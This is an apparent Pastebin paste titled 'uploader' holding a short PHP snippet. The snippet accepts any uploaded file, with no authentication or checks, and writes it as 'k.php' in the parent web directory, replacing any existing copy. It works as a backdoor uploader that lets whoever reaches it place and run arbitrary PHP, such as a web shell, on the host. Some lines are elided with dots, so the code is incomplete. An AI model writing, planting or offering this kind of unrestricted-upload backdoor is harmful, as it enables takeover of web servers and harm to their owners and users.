Advertisement
Tu5b0l3d

uploader

Sep 30th, 2015
1,570
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.21 KB | None | 0 0
  1. ganteng
  2. <?php
  3. $file3 = $_FILES['file3'];
  4.   $newfile3="k.php";
  5.         if (file_exists("../".$newfile3)) unlink("../".$newfile3);
  6.         move_uploaded_file($file3['tmp_name'], "../$newfile3");
  7.  
  8.  
  9. ...
  10. ......
  11. .......
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement